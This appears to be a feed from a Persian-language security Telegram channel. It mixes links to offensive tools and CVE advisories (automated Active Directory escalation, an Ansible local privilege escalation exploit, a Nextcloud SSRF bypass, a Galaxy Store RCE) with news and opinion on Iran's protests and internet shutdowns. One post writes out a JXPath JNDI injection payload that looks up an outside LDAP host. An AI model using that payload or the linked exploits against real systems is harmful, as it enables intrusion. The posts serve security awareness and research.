⭕️Autobloody

Automatically exploit Active Directory privilege escalation paths shown by BloodHound combining pathgen.py and autobloody.py.

Here is the list of the BloodHound edges currently supported for automatic exploitation:

    MemberOf
    ForceChangePassword
    AddMembers
    AddSelf
    DCSync
    GetChanges/GetChangesAll
    GenericAll
    WriteDacl
    GenericWrite
    WriteOwner
    Owns
    Contains
    AllExtendedRights

https://github.com/CravateRouge/autobloody
#ad #bloodhound
@securation

⚠️ Confirmed: Real-time network data show a near-total disruption to internet connectivity in #Sanandaj, the capital of Kurdistan Province in west #Iran; the incident comes amid widening protests over the death of #MahsaAmini after her arrest by morality police 📉

⭕️ANSIBLE

CVE-2022-2568

LPE exploit download
#linux #exploit #ansible
@securation

⭕️ بعد از اعلام هکرهای Anonymous برای حمله سایبری در توییتر , حملات DDOS متعددی روی سرویس های دولتی راه انداخته و سرویس ها از دسترس خارج شده اند.

#ddos #anonymous #hackers
@securation

⭕️ SSRF filter bypass in Nextcloud

فیلتر SSRF اعمال شده اندپوینت و آدرس مربوط به Alibaba metadata و google cloud metadata رو چک نمیکنه.

https://hackerone.com/reports/1608039
#SSRF #Nexcloud
@securation

⭕️ اون زمانی که تهدید شدیم به اینکه :
اکانت ها و VPS های فیلترشکن هاتون رو کجای خونتون قایم کردی؟!
گفتیم توی CD/DVD بود شکستیم.

البته امروزه فیلترشکن که دیگه عادی تره تازه !
یه زمانی میومدن تهدید میکردن که هرکسی از پروتکل SSL برای سایت ها استفاده کنه مجرم هست.
میگفتیم مشکلش چیه وقتی داریم امنیت سرویس رو بالا میبریم؟
میگفتن :
ما نمیدونیم این پروتکل چیه ، ولی دشمن اینو طراحی کرده که اطلاعات رمزنگاری شده رد و بدل بشن!

بقیه اش خودتون متوجه شدین قطعا :)

@securation

⭕️ طبق گفته ی خبرگزاری CNN ، بایدن به آقا ایلان گفته که ازت حمایت میکنیم بابت اینترنت ماهواره ای که به مردم شریف ایران میدید.
گفته هزینه های این کار رو برای مردم کاهش میده و هرگونه حمایت نیاز باشه انجام میدیم.
حالا فعلا مشخص نیست چطور اینکارو میکنه و هزینه ها رو چطوری میخواد کاهش بده ، ولی خب نابغه ی مغروری مثل ایلان ماسک قطعا قدرت خودش رو به رخ استاد روح الله مومن نسب و تمام مُریدانِ این طرح امنیتی #صیانت و تمام خاک خورده های قرن دوم میلادی نشون میده.
https://edition.cnn.com/2022/10/21/politics/white-house-musk-starlink-iran-protests-ukraine/index.html

#صیانت #ایلان_ماسک
@securation

⭕️Apache Commons Jxpath (CVE-2022-41852)

Payload:
jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");

PoC:
https://github.com/Warxim/CVE-2022-41852

Research:
https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/

#apache #jxpath #exploit
@securation

⭕️ Triggering RCE in the Samsung Galaxy phones via Galaxy Store Vulnerability

آسیب پذیری پیدا شده در Galaxy Store اجازه RCE توسط حمله کننده در تلفن همراه را می دهد.
این آسیب پذیری از طریق deeplink هندل شده نا امن رخ می دهد که به موجب آن حمله کننده قادر به اجرای کد JS در webview می شود. deeplink ها می توانند توسط اپلیکیشن های دیگر یا مرورگر فراخوانی شوند. Galaxy Store نیز هنگام دریافت deeplink مرتبط با خودش //:samsungapps آن را پردازش و از طریق webview نمایش می دهد.

https://ssd-disclosure.com/ssd-advisory-galaxy-store-applications-installation-launching-without-user-interaction/
#galaxy #store #rce
@securation

بازگشت ترامپ به توئیتر:

https://twitter.com/realdonaldtrump

⭕️ Malware Analysis Series

Link : pdf
#Malware
@securation

⭕️Advanced Github OSINT Framework

https://github.com/bellingcat/octosuite
#osint #tool
@securation

⭕️ناتو⁩ خود را برای یک "جنگ سایبری" آماده می‌کند.
‏حدود 150 کارشناس امنیت سایبری ناتو این هفته در استونی گردهم آمدند تا برای شبیه‌سازی مقابله با یک جنگ سایبری تمام عیار آماده شوند

https://www.politico.com/news/2022/12/03/nato-future-cyber-war-00072060
#cyberwar
@securation

⭕️ درحالی که توی کانادا مسابقات Pwn2Own 2022 در حال امادگی و برگزاری هست ، اینجا توی ایران یک مشت گاو نشستن روی کابل اینترنت فقط دنبال فیلتر کردن و قطع کانکشن های ارتباطی هستن.


https://www.zerodayinitiative.com/blog/2022/12/5/pwn2own-toronto-2022-the-schedule #pwn #pwn2own
@securation